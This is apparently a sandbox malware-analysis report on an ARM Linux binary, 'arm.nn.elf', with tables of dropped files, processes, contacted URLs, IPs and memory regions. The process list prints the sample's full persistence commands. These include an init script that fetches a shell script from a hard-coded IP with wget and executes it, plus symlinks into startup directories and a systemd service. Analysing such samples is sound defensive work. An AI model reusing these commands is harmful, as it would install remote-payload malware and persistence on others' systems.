Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
arm.nn.elf
|
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/arm.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/tmp/qemu-open.ZGvbRM (deleted)
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/arm.nn.elf
|
/tmp/arm.nn.elf
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf
&\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo
'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage:
$0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/arm.nn.elf
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 36 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://94.156.227.233/curl.sh
|
unknown
|
||
|
http://94.156.227.233/lol.sh
|
unknown
|
||
|
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
|
unknown
|
||
|
http://94.156.227.233/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
165.102.140.222
|
unknown
|
Japan
|
||
|
100.234.69.248
|
unknown
|
United States
|
||
|
58.81.113.91
|
unknown
|
Japan
|
||
|
20.159.104.188
|
unknown
|
United States
|
||
|
210.111.155.232
|
unknown
|
Korea Republic of
|
||
|
106.147.169.156
|
unknown
|
Japan
|
||
|
125.162.167.229
|
unknown
|
Indonesia
|
||
|
166.170.70.243
|
unknown
|
United States
|
||
|
17.121.216.183
|
unknown
|
United States
|
||
|
196.250.61.244
|
unknown
|
South Africa
|
||
|
36.172.89.245
|
unknown
|
China
|
||
|
206.215.151.169
|
unknown
|
United States
|
||
|
168.175.47.135
|
unknown
|
United States
|
||
|
40.183.146.182
|
unknown
|
United States
|
||
|
147.162.239.214
|
unknown
|
Italy
|
||
|
160.115.0.106
|
unknown
|
South Africa
|
||
|
193.225.112.79
|
unknown
|
Hungary
|
||
|
216.1.213.140
|
unknown
|
United States
|
||
|
118.69.50.229
|
unknown
|
Viet Nam
|
||
|
26.1.82.154
|
unknown
|
United States
|
||
|
128.34.188.220
|
unknown
|
United States
|
||
|
106.229.167.52
|
unknown
|
China
|
||
|
111.185.124.238
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
168.183.96.48
|
unknown
|
United States
|
||
|
64.15.171.163
|
unknown
|
United States
|
||
|
170.22.36.119
|
unknown
|
United States
|
||
|
49.108.208.146
|
unknown
|
Japan
|
||
|
26.1.66.176
|
unknown
|
United States
|
||
|
19.99.69.215
|
unknown
|
United States
|
||
|
77.251.175.41
|
unknown
|
Netherlands
|
||
|
179.78.150.141
|
unknown
|
Brazil
|
||
|
37.86.102.231
|
unknown
|
Germany
|
||
|
47.106.0.180
|
unknown
|
China
|
||
|
196.228.171.177
|
unknown
|
Tunisia
|
||
|
122.161.195.157
|
unknown
|
India
|
||
|
45.70.92.236
|
unknown
|
Brazil
|
||
|
76.152.134.171
|
unknown
|
United States
|
||
|
78.134.79.140
|
unknown
|
Italy
|
||
|
58.182.140.164
|
unknown
|
Singapore
|
||
|
209.10.225.75
|
unknown
|
United States
|
||
|
209.200.130.178
|
unknown
|
United States
|
||
|
115.156.54.47
|
unknown
|
China
|
||
|
190.107.198.190
|
unknown
|
Brazil
|
||
|
138.174.94.84
|
unknown
|
United States
|
||
|
178.86.216.63
|
unknown
|
Saudi Arabia
|
||
|
175.33.29.59
|
unknown
|
Australia
|
||
|
153.159.35.234
|
unknown
|
Japan
|
||
|
23.91.166.223
|
unknown
|
Canada
|
||
|
144.231.37.103
|
unknown
|
United States
|
||
|
11.197.35.23
|
unknown
|
United States
|
||
|
16.188.232.199
|
unknown
|
United States
|
||
|
149.238.184.54
|
unknown
|
Germany
|
||
|
119.75.215.154
|
unknown
|
China
|
||
|
53.129.20.90
|
unknown
|
Germany
|
||
|
151.61.77.44
|
unknown
|
Italy
|
||
|
61.227.68.19
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
153.105.64.182
|
unknown
|
United States
|
||
|
130.194.103.107
|
unknown
|
Australia
|
||
|
16.96.46.120
|
unknown
|
United States
|
||
|
211.121.60.139
|
unknown
|
Japan
|
||
|
12.102.38.154
|
unknown
|
United States
|
||
|
69.251.131.238
|
unknown
|
United States
|
||
|
111.72.118.50
|
unknown
|
China
|
||
|
121.204.27.175
|
unknown
|
China
|
||
|
159.150.20.88
|
unknown
|
United States
|
||
|
163.246.181.245
|
unknown
|
United States
|
||
|
102.232.91.38
|
unknown
|
unknown
|
||
|
158.6.96.184
|
unknown
|
United States
|
||
|
164.12.214.181
|
unknown
|
United Kingdom
|
||
|
126.66.249.145
|
unknown
|
Japan
|
||
|
175.38.140.56
|
unknown
|
Australia
|
||
|
9.18.12.224
|
unknown
|
United States
|
||
|
16.122.132.235
|
unknown
|
United States
|
||
|
218.112.187.78
|
unknown
|
Japan
|
||
|
97.229.160.115
|
unknown
|
United States
|
||
|
26.163.188.107
|
unknown
|
United States
|
||
|
216.155.111.52
|
unknown
|
United States
|
||
|
55.136.32.117
|
unknown
|
United States
|
||
|
21.152.225.5
|
unknown
|
United States
|
||
|
34.252.132.197
|
unknown
|
United States
|
||
|
152.9.28.133
|
unknown
|
United States
|
||
|
102.39.5.161
|
unknown
|
South Africa
|
||
|
197.238.32.97
|
unknown
|
unknown
|
||
|
135.50.184.245
|
unknown
|
United States
|
||
|
139.84.237.184
|
unknown
|
United States
|
||
|
202.142.152.155
|
unknown
|
Pakistan
|
||
|
63.72.153.161
|
unknown
|
United States
|
||
|
7.102.4.232
|
unknown
|
United States
|
||
|
18.58.126.71
|
unknown
|
United States
|
||
|
154.174.163.156
|
unknown
|
Ghana
|
||
|
11.8.205.28
|
unknown
|
United States
|
||
|
157.12.75.195
|
unknown
|
Japan
|
||
|
148.34.185.37
|
unknown
|
United States
|
||
|
173.191.39.221
|
unknown
|
United States
|
||
|
123.25.28.243
|
unknown
|
Viet Nam
|
||
|
44.85.104.194
|
unknown
|
United States
|
||
|
8.111.230.109
|
unknown
|
United States
|
||
|
96.155.193.28
|
unknown
|
United States
|
||
|
134.253.73.61
|
unknown
|
United States
|
||
|
11.13.88.167
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f5010032000
|
page execute read
|
|
||
|
7f51160e8000
|
page read and write
|
|||
|
55576980f000
|
page execute and read and write
|
|||
|
7f5117633000
|
page read and write
|
|||
|
7f5116ce4000
|
page read and write
|
|||
|
555769826000
|
page read and write
|
|||
|
7f5116982000
|
page read and write
|
|||
|
7ffdbaa9d000
|
page read and write
|
|||
|
555767811000
|
page read and write
|
|||
|
7ffdbab29000
|
page execute read
|
|||
|
55576a75a000
|
page read and write
|
|||
|
555767808000
|
page read and write
|
|||
|
7f5116f72000
|
page read and write
|
|||
|
7f501003f000
|
page read and write
|
|||
|
7f51175ee000
|
page read and write
|
|||
|
7f51174a1000
|
page read and write
|
|||
|
7f51168f0000
|
page read and write
|
|||
|
5557675b7000
|
page execute read
|
|||
|
7f501003a000
|
page read and write
|
|||
|
7f5110021000
|
page read and write
|
|||
|
7f5116f4f000
|
page read and write
|
|||
|
7f510ffff000
|
page read and write
|
|||
|
7f51172c0000
|
page read and write
|
|||
|
7f51170de000
|
page read and write
|
|||
|
7f51175ca000
|
page read and write
|
There are 15 hidden memdumps, click here to show them.